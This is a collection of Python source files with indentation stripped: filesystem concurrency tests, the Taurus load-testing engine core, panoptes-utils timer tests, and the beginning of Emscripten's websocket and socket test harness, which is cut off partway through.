self.assertTrue(self.fs.isdir("/"))
self.fs.makedir(subdir)
self._yield()
getattr(this, meth)()
@property
def fs(this):
return self.fs.opendir(this.subdir)
def check(this, p):
return self.check(pathjoin(this.subdir, relpath(p)))
def thread1():
TestCases_in_subdir("thread1")
def thread2():
TestCases_in_subdir("thread2")
def thread3():
TestCases_in_subdir("thread3")
self._runThreads(thread1, thread2, thread3)
def test_makedir_winner(self):
errors = []
def makedir():
try:
self.fs.makedir("testdir")
except DestinationExistsError as e:
errors.append(e)
def makedir_noerror():
try:
self.fs.makedir("testdir", allow_recreate=True)
except DestinationExistsError as e:
errors.append(e)
def removedir():
try:
self.fs.removedir("testdir")
except (ResourceNotFoundError, ResourceLockedError) as e:
errors.append(e)
# One thread should succeed, one should error
self._runThreads(makedir, makedir)
self.assertEqual(len(errors), 1)
self.fs.removedir("testdir")
# One thread should succeed, two should error
errors = []
self._runThreads(makedir, makedir, makedir)
if len(errors) != 2:
raise AssertionError(errors)
self.fs.removedir("testdir")
# All threads should succeed
errors = []
self._runThreads(makedir_noerror, makedir_noerror, makedir_noerror)
self.assertEqual(len(errors), 0)
self.assertTrue(self.fs.isdir("testdir"))
self.fs.removedir("testdir")
# makedir() can beat removedir() and vice-versa
errors = []
self._runThreads(makedir, removedir)
if self.fs.isdir("testdir"):
self.assertEqual(len(errors), 1)
self.assertFalse(isinstance(errors[0], DestinationExistsError))
self.fs.removedir("testdir")
else:
self.assertEqual(len(errors), 0)
def test_concurrent_copydir(self):
self.fs.makedir("a")
self.fs.makedir("a/b")
self.fs.setcontents("a/hello.txt", b("hello world"))
self.fs.setcontents("a/guido.txt", b("is a space alien"))
self.fs.setcontents("a/b/parrot.txt", b("pining for the fiords"))
def copydir():
self._yield()
self.fs.copydir("a", "copy of a")
def copydir_overwrite():
self._yield()
self.fs.copydir("a", "copy of a", overwrite=True)
# This should error out since we're not overwriting
self.assertRaises(
DestinationExistsError, self._runThreads, copydir, copydir)
self.assertTrue(self.fs.isdir('a'))
self.assertTrue(self.fs.isdir('a'))
copydir_overwrite()
self.assertTrue(self.fs.isdir('a'))
# This should run to completion and give a valid state, unless
# files get locked when written to.
try:
self._runThreads(copydir_overwrite, copydir_overwrite)
except ResourceLockedError:
pass
self.assertTrue(self.fs.isdir("copy of a"))
self.assertTrue(self.fs.isdir("copy of a/b"))
self.assertEqual(self.fs.getcontents(
"copy of a/b/parrot.txt", 'rb'), b("pining for the fiords"))
self.assertEqual(self.fs.getcontents(
"copy of a/hello.txt", 'rb'), b("hello world"))
self.assertEqual(self.fs.getcontents(
"copy of a/guido.txt", 'rb'), b("is a space alien"))
def test_multiple_overwrite(self):
contents = [b("contents one"), b(
"contents the second"), b("number three")]
def thread1():
for i in range(30):
for c in contents:
self.fs.setcontents("thread1.txt", c)
self.assertEqual(self.fs.getsize("thread1.txt"), len(c))
self.assertEqual(self.fs.getcontents(
"thread1.txt", 'rb'), c)
def thread2():
for i in range(30):
for c in contents:
self.fs.setcontents("thread2.txt", c)
self.assertEqual(self.fs.getsize("thread2.txt"), len(c))
self.assertEqual(self.fs.getcontents(
"thread2.txt", 'rb'), c)
self._runThreads(thread1, thread2)
# Uncomment to temporarily disable threading tests
# class ThreadingTestCases(object):
# _dont_retest = ()
|
engine.py
|
"""
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import json
import logging
import os
import pkgutil
import shutil
import sys
import threading
import time
import traceback
import uuid
from distutils.version import LooseVersion
from urllib import parse
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException
from bzt.utils import reraise, load_class, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux, temp_file
from bzt.utils import shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient, Environment
from bzt.utils import NETWORK_PROBLEMS
from .dicts import Configuration
from .modules import Provisioning, Reporter, Service, Aggregator, EngineModule
from .names import EXEC, TAURUS_ARTIFACTS_DIR, SETTINGS
from .templates import Singletone
from ..environment_helpers import expand_variable_with_os, custom_expandvars, expand_envs_with_os
from bzt.resources.version import VERSION, DEV_VERSION
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]EXEC
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.aggregator.engine = self
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self.user_pythonpath = None
self.temp_pythonpath = None
self._http_client = None
self.graceful_tmp = None
def set_pythonpath(self):
version = sys.version.split(' ')[0]
path_suffix = os.path.join('python-packages', version)
self.user_pythonpath = get_full_path(os.path.join("~", ".bzt", path_suffix))
self.temp_pythonpath = get_full_path(os.path.join(self.artifacts_dir, path_suffix))
current_pythonpath = os.environ.get('PYTHONPATH', '')
paths = self.user_pythonpath, self.temp_pythonpath, current_pythonpath
self.log.debug("Set PYTHONPATH to :\n\tUSER: '{}' +\n\tTEMP: '{}' +\n\tCURRENT: '{}'".format(*paths))
try:
user_packages = os.listdir(self.user_pythonpath)
except:
user_packages = []
self.log.debug("Content of user packages dir: {}".format(user_packages))
os.environ['PYTHONPATH'] = os.pathsep.join(paths)
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions: # type: BetterDict
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work, will call preparing of Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
self.graceful_tmp = self.create_artifact(prefix="GRACEFUL", suffix="")
env = env.get()
env['GRACEFUL'] = self.graceful_tmp
return shell_exec(args, cwd=cwd, env=env, **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait modules for finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
if self.graceful_tmp:
open(self.graceful_tmp, 'x').close()
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if self.graceful_tmp and os.path.exists(self.graceful_tmp):
os.remove(self.graceful_tmp)
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = self.__expand_artifacts_dir()
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not good since this file not exists
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def __expand_artifacts_dir(self):
envs = self.__get_envs_from_config()
artifacts_dir = custom_expandvars(self.artifacts_dir, envs)
artifacts_dir = expand_variable_with_os(artifacts_dir)
artifacts_dir = get_full_path(artifacts_dir)
return artifacts_dir
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find file or dir in search_path if it was specified. Helps finding files
in non-CLI environments or relative to config path
Return path is full and mustn't treat with abspath/etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
return False
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
if VERSION == DEV_VERSION:
return
params = (VERSION, install_id)
addr = "https://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
try:
response = client.request('GET', addr, timeout=10)
except NETWORK_PROBLEMS:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
return
data = response.json()
latest = data.get('latest')
needs_upgrade = data.get('needsUpgrade')
if latest is None or needs_upgrade is None:
self.log.warning(f'Wrong updates info: "{data}"')
else:
self.log.debug(f'Taurus updates info: "{data}"')
mine = LooseVersion(VERSION)
if (mine < latest) or needs_upgrade:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.__get_envs_from_config()
envs = expand_envs_with_os(envs)
def apply_env(value, key, container):
if isinstance(value, str):
container[key] = custom_expandvars(value, envs)
BetterDict.traverse(self.config, apply_env)
self.__export_variables_to_os()
def __export_variables_to_os(self):
"""
Export all user-defined environment variables to the system.
Example:
settings:
env:
FOO: bbb/ccc
BAR: aaa
"""
envs = self.__get_envs_from_config()
for var_name in envs:
if envs[var_name] is None:
if var_name in os.environ:
os.environ.pop(var_name)
else:
os.environ[var_name] = envs[var_name]
self.log.debug("OS env: %s=%s", var_name, envs[var_name])
def __get_envs_from_config(self):
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
return envs
|
test_time.py
|
import os
import threading
import time
from datetime import datetime as dt
from datetime import timezone as tz
import pytest
from astropy import units as u
from panoptes.utils import CountdownTimer
from panoptes.utils import current_time
from panoptes.utils import error
from panoptes.utils.time import wait_for_events
def test_pretty_time():
t0 = '2016-08-13 10:00:00'
os.environ['POCSTIME'] = t0
t1 = current_time(pretty=True)
assert t1 == t0
# This will increment one second - see docs
t2 = current_time(flatten=True)
assert t2 != t0
assert t2 == '20160813T100001'
# This will increment one second - see docs
t3 = current_time(datetime=True)
assert t3 == dt(2016, 8, 13, 10, 0, 2, tzinfo=tz.utc)
def test_countdown_timer_bad_input():
with pytest.raises(ValueError):
assert CountdownTimer('d')
with pytest.raises(ValueError):
assert CountdownTimer(current_time())
with pytest.raises(AssertionError):
assert CountdownTimer(-1)
def test_countdown_timer_non_blocking():
timer = CountdownTimer(0)
assert timer.is_non_blocking
assert timer.time_left() == 0
for arg, expected_duration in [(2, 2.0), (0.5, 0.5), (1 * u.second, 1.0)]:
timer = CountdownTimer(arg)
assert timer.duration == expected_duration
def test_countdown_timer():
count_time = 1
timer = CountdownTimer(count_time)
assert timer.time_left() > 0
assert timer.expired() is False
assert timer.is_non_blocking is False
counter = 0.
while timer.time_left() > 0:
time.sleep(0.1)
counter += 0.1
assert counter == pytest.approx(1)
assert timer.time_left() == 0
assert timer.expired() is True
def test_countdown_timer_sleep():
count_time = 1
timer = CountdownTimer(count_time)
assert timer.time_left() > 0
assert timer.expired() is False
assert timer.is_non_blocking is False
counter = 0.
while timer.time_left() > 0.5:
assert timer.sleep(max_sleep=0.1)
counter += 0.1
# Wait for the remaining half second
assert timer.sleep() is False
assert counter == pytest.approx(0.5)
assert timer.time_left() == 0
assert timer.expired() is True
assert timer.sleep() is False
def test_countdown_timer_sleep_log(caplog):
count_time = 1
timer = CountdownTimer(count_time)
# Default is a debug level
timer.sleep()
assert caplog.records[-1].levelname == 'DEBUG'
assert caplog.records[-1].message.startswith('Sleeping for')
timer.restart()
timer.sleep(log_level='info')
assert caplog.records[-1].levelname == 'INFO'
assert caplog.records[-1].message.startswith('Sleeping for')
@pytest.mark.slow
def test_wait_for_events():
# Create some events, normally something like taking an image.
event0 = threading.Event()
event1 = threading.Event()
# Wait for 30 seconds but interrupt after 1 second by returning True.
def interrupt_cb():
time.sleep(1)
return False
assert wait_for_events([event0, event1], timeout=30, callback=interrupt_cb) is False
# Timeout if event is never set.
with pytest.raises(error.Timeout):
wait_for_events(event0, timeout=1)
# Setting events causes timer to exit.
def set_events():
time.sleep(3)
event0.set()
event1.set()
threading.Thread(target=set_events).start()
assert wait_for_events([event0, event1], timeout=30)
# If the events are set then the function will return immediately
assert wait_for_events([event0, event1], timeout=30)
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import multiprocessing
import os
import socket
import shutil
import sys
import time
from subprocess import Popen
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner sockets')
import clang_native
import common
from common import BrowserCore, no_windows, create_file, test_file, read_file
from common import parameterized, requires_native_clang, PYTHON
from tools import shared, config, utils
from tools.shared import EMCC, path_from_root, run_process, CLANG_CC
npm_checked = False
def clean_processes(processes):
for p in processes:
if getattr(p, 'exitcode', None) is None and getattr(p, 'returncode', None) is None:
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
p.terminate() # SIGKILL
except OSError:
pass
class WebsockifyServerHarness():
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
cmd = [CLANG_CC, test_file(self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args
print(cmd)
run_process(cmd, env=clang_native.get_clang_native_env())
process = Popen([os.path.abspath('server')])
self.processes.append(process)
import websockify
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
return self
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness():
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(config.NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([EMCC, '-Werror', test_file(self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(config.NODE_JS + ['server.js'])
self.processes.append(process)
return self
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess():
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
return self
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(config.NODE_JS + [test_file('websocket/nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, test_file('websocket/tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super().setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use
# consecutive server listen ports, because server teardown might not occur deterministically
# (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port
# addresses. If adding new tests, increment the used port addresses below.
@parameterized({
'websockify': [WebsockifyServerHarness, 49160, ['-DTEST_DGRAM=0']],
'tcp': [CompiledServerHarness, 49161, ['-DTEST_DGRAM=0']],
